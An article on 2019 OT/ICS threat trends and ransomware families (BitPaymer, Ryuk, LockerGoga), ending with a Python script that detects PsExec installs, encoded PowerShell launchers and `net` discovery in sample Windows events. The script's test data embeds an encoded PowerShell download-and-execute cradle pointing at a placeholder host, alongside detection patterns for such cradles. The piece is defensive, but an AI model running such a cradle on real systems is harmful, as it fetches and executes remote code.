The estimated number of published OT vulnerabilities that are actually exploitable varies. A survey by researchers from Virginia Tech and other research institutes estimated that “5.5% of all 100,000+ vulnerabilities contained in the National Vulnerability Database have been exploited in the wild”.
The European Union Agency for Cybersecurity (ENISA) claims that “at least 8.65% of vulnerabilities are exploitable… this number is expected to be higher due to zero-day exploits and the incompleteness of the datasets”. It should be noted that this figure refers to both OT and IT vulnerabilities.
Tactics, Techniques and Procedures
Many 2019 reports point out a rise in masquerading. This is done, for example, to steal log-on IDs and passwords or find security gaps in programs. In addition, we’ve also observed a rise in the use of SMB protocol exploitation.
According to CrowdStrike’s report, there has been a rise in malware-free attacks. Malware-free attacks are attacks where the initial tactic did not result in a file or file fragment being written to disk, for example attacks where code executes from memory or where stolen credentials are used for remote login using known tools.
“Hands-on-keyboard” techniques have also been on the rise, including command-line interface attacks, PowerShell and credential theft, credential dumping, and account discovery.
The hacking “industry” is transitioning to an outsourced service model. This model includes Ransomware-as-a-service (RaaS) (e.g. LockerGoga that attacked ICS manufacturing facilities), Malware-as-a-service (MaaS), and Download-as-a-Service (DaaS).
Finally, there has been a prolific use of network shell commands, RDP, RATs, Active Directory scanners, network protocol vulnerability exploitation, non-secure DNS manipulation (DNS tunneling, Anchoring), and remote code execution (RCE).
2019 OT Advisories and Increase in Attacks
All the 2019 reports I have read were unequivocal about the rise of attacks on the ICS sector. Moreover, in a recent survey of OT leaders, 77% of respondents said they had experienced a malware intrusion in the past year, and half experienced between three and ten.
The Tactics, Techniques and Procedures (TTPs) aimed at the ICS environment that made the headlines were BitPaymer, Ryuk, and LockerGoga.
BitPaymer – BitPaymer is a Ransomware that collects data such as Active Directory (AD) credentials, private user data and lists of all computers on the network. BitPaymer uses the PowerShell Empire tool for lateral movement in the network.
Ryuk – Ryuk is a ransomware that resembles and is probably somewhat based on BitPaymer. It uses TrickBot modules (e.g. pwgrab) to execute credential theft, and PowerShell Empire traffic for reconnaissance and lateral movement.
LockerGoga – uses PsExec (a sys-admin tool) to perform reconnaissance and lateral movement in the network. Since LockerGoga neither gives the victims a chance to recover the files nor specifically asks for payment, it is likely intended to disrupt operations.
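The “hands-on-keyboard” techniques listed earlier and the three ransomware families above share a small set of host-level traces that a defender can look for: a PsExec-style remote service installation (System log Event ID 7045 with the default service name PSEXESVC), an encoded PowerShell launcher with a hidden window of the kind PowerShell Empire produces, and account discovery through `net` commands (Security log Event ID 4688). The following script is an added example written for this article, not code from the original post or from any of the reports it cites. It runs those three detection rules over a handful of constructed, simplified Windows event records; the event field names, the hostnames and the sample command lines are assumptions made for the example and are not taken from any real incident.

```python
"""Detect lateral-movement and discovery indicators in simplified Windows event logs.

Added example, not part of the original article. Event field names, hostnames
and command lines below are constructed for illustration.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Finding:
    host: str
    event_id: int
    rule: str
    detail: str


# Constructed sample events: a subset of fields from Event ID 7045
# ("A service was installed in the system") and Event ID 4688 (process creation).
SAMPLE_EVENTS: List[Dict] = [
    {"host": "hmi-01", "event_id": 7045, "service_name": "PSEXESVC",
     "image_path": "%SystemRoot%\\PSEXESVC.exe"},
    {"host": "eng-ws-07", "event_id": 4688,
     "command_line": "powershell -NoP -NonI -W Hidden -Enc " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
         .encode("utf-16-le")).decode()},
    {"host": "eng-ws-07", "event_id": 4688,
     "command_line": 'net group "domain admins" /domain'},
    {"host": "hist-02", "event_id": 4688,
     "command_line": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
    {"host": "hist-02", "event_id": 7045, "service_name": "Spooler",
     "image_path": "C:\\Windows\\System32\\spoolsv.exe"},
]

# -Enc / -EncodedCommand (and PowerShell's accepted abbreviations) followed by base64.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
# -W Hidden / -WindowStyle Hidden, typical of Empire-style launchers.
HIDDEN_FLAG = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
# Account and host discovery via the net / net1 commands.
DISCOVERY_CMDS = re.compile(r"(?i)\bnet1?(?:\.exe)?\s+(?:user|group|localgroup|view)\b")
# Download-cradle fragments commonly seen inside decoded launchers.
CRADLE_PATTERNS = ("downloadstring", "iex", "invoke-expression", "frombase64string")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None if absent/invalid."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_events(events: List[Dict]) -> List[Finding]:
    """Apply the three rules to each event and collect findings in log order."""
    findings: List[Finding] = []
    for ev in events:
        host, event_id = ev["host"], ev["event_id"]
        if event_id == 7045:
            name = ev.get("service_name", "")
            path = ev.get("image_path", "")
            # PsExec installs a service named PSEXESVC by default.
            if name.upper().startswith("PSEXESVC") or "PSEXESVC" in path.upper():
                findings.append(Finding(host, event_id, "psexec_service_install",
                                        f"{name} -> {path}"))
        elif event_id == 4688:
            cmd = ev.get("command_line", "")
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                # Hidden window or a download cradle upgrades the finding to "launcher".
                launcher = bool(HIDDEN_FLAG.search(cmd)) or any(
                    p in decoded.lower() for p in CRADLE_PATTERNS)
                rule = "encoded_powershell_launcher" if launcher else "encoded_powershell"
                findings.append(Finding(host, event_id, rule, decoded[:80]))
            if DISCOVERY_CMDS.search(cmd):
                findings.append(Finding(host, event_id, "account_discovery", cmd))
    return findings


def hosts_with_findings(findings: List[Finding]) -> List[str]:
    """Distinct hosts that triggered at least one rule, sorted for reporting."""
    return sorted({f.host for f in findings})


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.host:10} {f.event_id} {f.rule:28} {f.detail}")
```

On the constructed input the scan flags the PSEXESVC installation on hmi-01, the hidden encoded launcher and the `net group` query on eng-ws-07, and nothing on hist-02, whose Spooler service and svchost process are ordinary. Each rule is an indicator rather than proof: administrators do use PsExec and encoded commands legitimately, so in practice these findings are correlated by host and time window (a 7045 followed shortly by 4688 discovery commands is far more telling than either alone) before anyone is paged.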